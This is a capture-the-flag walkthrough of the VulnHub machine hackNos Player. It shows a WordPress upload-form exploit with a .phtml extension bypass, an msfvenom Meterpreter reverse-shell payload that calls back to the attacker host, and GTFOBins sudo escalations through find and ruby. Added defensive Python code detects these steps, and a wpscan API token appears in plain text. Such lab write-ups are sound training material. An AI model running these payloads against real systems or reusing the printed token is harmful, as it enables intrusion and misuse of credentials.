Vulnhub target: hacknos_ PLAYER V1.1
2022-07-06 12:22:00 【lainwith】
Introduction
Series: hackNos (the series consists of 7 target machines)
Release date: 10 April 2020
Difficulty: beginner to intermediate
Flag: 1 flag, root.txt of the root user
What you will practise:
- WordPress security testing
- Remote code execution
- Privilege escalation
Target address: https://www.vulnhub.com/entry/hacknos-player-v11,459/
Information gathering
Host discovery
Host discovery with arp-scan
For VulnHub targets, the host whose vendor shows as "PCS Systemtechnik GmbH" (the VirtualBox MAC prefix) is the target.
Host information detection
- Open port detection:
nmap -p- 192.168.1.117
Only ports 80 and 3306 are open (this quickly confirms the open ports).
- Further probing of the services on the open ports:
nmap -p80,3306 -sV 192.168.1.117
- Scan with the default NSE scripts:
nmap -p3306 -sC 192.168.1.117
The database version is reported as 5.5.5.
Website detection
Visiting port 80 reveals nothing of value.
Directory scanning
gobuster dir -u http://192.168.1.117/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100
Nothing of value was found, and switching to a larger wordlist, the approach used in the earlier HACLABS: NO_NAME write-up, was still unsuccessful. With no other leads, I went back to the homepage to see whether anything there was useful, and found a site directory: "[email protected]"
Because the page has to load a Google site API, it opens slowly. After waiting patiently for a while I saw the site shown below; the browser plugin identifies it as WordPress 5.3.11.
Enumerate the site's usernames and accounts with wpscan
wpscan --url http://192.168.1.117/[email protected] -e u --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8
A message was found.
Opening the linked page, this should be a password: [email protected]!!
Trying to log in to the site with it fails.
Vulnerability scan of the site with wpscan
wpscan --url http://192.168.1.117/[email protected]/ -e vp --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8
A remote code execution vulnerability was found!
Opening the reference it points to shows the exploit code.
Copy it, adjust the URL slightly, and you get:
<form method="post" enctype="multipart/form-data" action="http://192.168.1.117/[email protected]/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="wpsp_upload_attachment">
Choose a file ending with .phtml:
<input type="file" name="0">
<input type="submit" value="Submit">
</form>
After doing this, an uploaded file can be accessed at, say:
http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml
Save it as a local HTML file and open it in a browser. As the picture shows, it is a file upload form.
That makes things easy: upload a one-line PHP webshell.
Getshell
Because the webshell management tool's font size and background colour are awkward for screenshots, I used msf instead.
- Prepare msf
Create the backdoor:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.118 LPORT=4444 > shell.php
Start the listener:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.1.118
exploit
- Upload the backdoor: fails
The error says the file format is not supported. I was really careless: looking back at the vulnerability write-up, the cause of the bug is that the plugin checks the extension with a simple switch/case against a blacklist of suffixes, which can be bypassed, and the write-up suggests using .phtml.
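The denylist-versus-allowlist point above, as an added Python illustration that is not the plugin's code and not part of the original post: the first function mirrors a switch/case over a constructed blacklist of PHP spellings, so .phtml passes; the second is the hardened form, which accepts only a single allowlisted extension and rejects a script extension anywhere in the name.

```python
import os
import re

# Constructed denylist standing in for the switch/case described in the write-up:
# only a few PHP spellings are rejected, so anything else (e.g. .phtml) goes through.
DENYLISTED_EXTENSIONS = {"php", "php3", "php4", "php5", "phps"}

# Hardened form: an allowlist of what the upload feature actually needs, plus a
# rule rejecting any script extension anywhere in the name, because Apache's
# mod_mime (with AddHandler-style config) can run "shell.php.jpg" as PHP.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phps", "phtml", "phar", "pht"}
SAFE_STEM = re.compile(r"^[a-z0-9_-]{1,64}$")


def _extensions(filename: str) -> list:
    """Every dot-separated suffix of the basename, lowercased.
    'Shell.phtml.JPG' -> ['phtml', 'jpg'], 'noext' -> []"""
    base = os.path.basename(filename).lower()
    return base.split(".")[1:]


def denylist_accepts(filename: str) -> bool:
    """Vulnerable check: compare only the final extension against a denylist."""
    exts = _extensions(filename)
    last = exts[-1] if exts else ""
    return last not in DENYLISTED_EXTENSIONS


def allowlist_accepts(filename: str) -> bool:
    """Hardened check: a plain stem, exactly one extension, and that extension
    must be allowlisted (and never a script extension, even if someone later
    widens the allowlist carelessly)."""
    base = os.path.basename(filename).lower()
    stem, _, _ = base.partition(".")
    exts = _extensions(filename)
    if len(exts) != 1 or not SAFE_STEM.match(stem):
        return False
    if exts[0] in SCRIPT_EXTENSIONS:
        return False
    return exts[0] in ALLOWED_EXTENSIONS
```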
Suffix bypass
- Rename the backdoor's extension to .phtml and upload it again
- Access the backdoor
According to the exploit code, the uploaded file is under: http://example.com/wp-content/uploads/wpsp
- Get a shell
Clicking the file gives a shell.
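For a defender, a successful request for a .phtml file below wp-content/uploads is the tell-tale of this chain. Added example, not part of the original post: a parser over constructed combined-format access log lines that reports 2xx requests for server-side script files under /wp-content/uploads/; the "/blog/" prefix, timestamps and file names are placeholders.

```python
import re
from urllib.parse import urlsplit

# Minimal pattern for the fields we need from Apache/nginx "combined" log lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phps", "phtml", "phar", "pht"}
UPLOAD_DIR = "/wp-content/uploads/"   # WordPress may live in a sub-directory, so use 'in'


def is_script_under_uploads(target: str) -> bool:
    """True if the request path lies below wp-content/uploads and any extension
    of its basename is a server-side script extension ('a.phtml.jpg' counts)."""
    path = urlsplit(target).path.lower()
    if UPLOAD_DIR not in path:
        return False
    name = path.rsplit("/", 1)[-1]
    return any(ext in SCRIPT_EXTENSIONS for ext in name.split(".")[1:])


def find_webshell_hits(lines) -> list:
    """(ip, timestamp, path, status) for each successful request for a script
    file under uploads. Only 2xx is reported: a 404 means nothing was dropped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and m["status"].startswith("2") and is_script_under_uploads(m["target"]):
            hits.append((m["ip"], m["ts"], urlsplit(m["target"]).path, int(m["status"])))
    return hits


# Constructed sample lines (not captured from the box); "/blog/" stands in for the
# site directory and the IPs are the lab addresses used in the write-up.
SAMPLE_LOG = [
    '192.168.1.118 - - [10/Apr/2020:10:01:02 +0000] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"',
    '192.168.1.118 - - [10/Apr/2020:10:01:09 +0000] "GET /blog/wp-content/uploads/wpsp/1586512869_shell.phtml HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Apr/2020:10:02:00 +0000] "GET /blog/wp-content/uploads/2020/04/logo.png HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Apr/2020:10:02:30 +0000] "GET /blog/wp-content/uploads/wpsp/old.php HTTP/1.1" 404 210 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for hit in find_webshell_hits(SAMPLE_LOG):
        print("suspicious upload access:", hit)
```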
Privilege escalation
Using the password obtained earlier with wpscan, **[email protected]!!**, I tried the users in turn; it works for the **security** user.
A sensitive file was found, but there is no permission to read it yet.
sudo privilege escalation
- First sudo escalation
The hint shows that find can be run as user hacknos to escalate. There are only three users, hackNos-boat, hunter and security, so hacknos here should mean hackNos-boat.
As the picture shows, switching to user hacknos fails, while switching to hackNos-boat succeeds.
From https://gtfobins.github.io/gtfobins/find/ the escalation command is:
sudo -u hackNos-boat find . -exec /bin/bash \; -quit
- Second sudo escalation
Continuing to try sudo escalation, ruby can be used; from https://gtfobins.github.io/gtfobins/ruby/ the command is:
sudo -u hunter ruby -e 'exec "/bin/sh"'
- Third sudo escalation
Get all the flags.
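The sudo rules in this chain (find as hackNos-boat, ruby as hunter) are exactly the kind GTFOBins catalogues, and an administrator can catch them before a pentester does. Added example, not part of the original post: a parser for `sudo -l` output that flags rules whose command is a known shell-capable binary; the SHELL_CAPABLE set is a small constructed subset of that catalogue and SAMPLE_SUDO_L is a constructed sample modelled on this box, not captured from it.

```python
import re

# Binaries GTFOBins documents as able to spawn a shell when allowed via sudo.
# find and ruby are the ones used in this write-up; the rest are a constructed sample.
SHELL_CAPABLE = {"find", "ruby", "python", "python3", "perl", "vim", "less", "awk", "env"}

# One rule line as printed by `sudo -l`: "(runas) [NOPASSWD:] /path/to/cmd [args]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(text: str) -> list:
    """(runas, nopasswd, command) for every rule line in `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append((m["runas"].strip(), "NOPASSWD:" in m["tags"], m["cmd"]))
    return rules


def risky_rules(text: str) -> list:
    """Rules whose command (basename of its first word) is a shell-capable binary.
    A bare 'ALL' command is reported too, since it covers every binary."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        prog = cmd.split()[0]
        name = prog.rsplit("/", 1)[-1]
        if prog == "ALL" or name in SHELL_CAPABLE:
            findings.append({"runas": runas, "nopasswd": nopasswd,
                             "command": cmd, "binary": name})
    return findings


# Constructed output modelled on the chain described above (not captured from the box).
SAMPLE_SUDO_L = """\
Matching Defaults entries for security on hacknos:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User security may run the following commands on hacknos:
    (hackNos-boat) /usr/bin/find
    (hunter) NOPASSWD: /usr/bin/ruby
    (root) /usr/bin/apt-get update
"""

if __name__ == "__main__":
    for f in risky_rules(SAMPLE_SUDO_L):
        print(f"shell escape possible as {f['runas']} via {f['binary']}: {f['command']}")
```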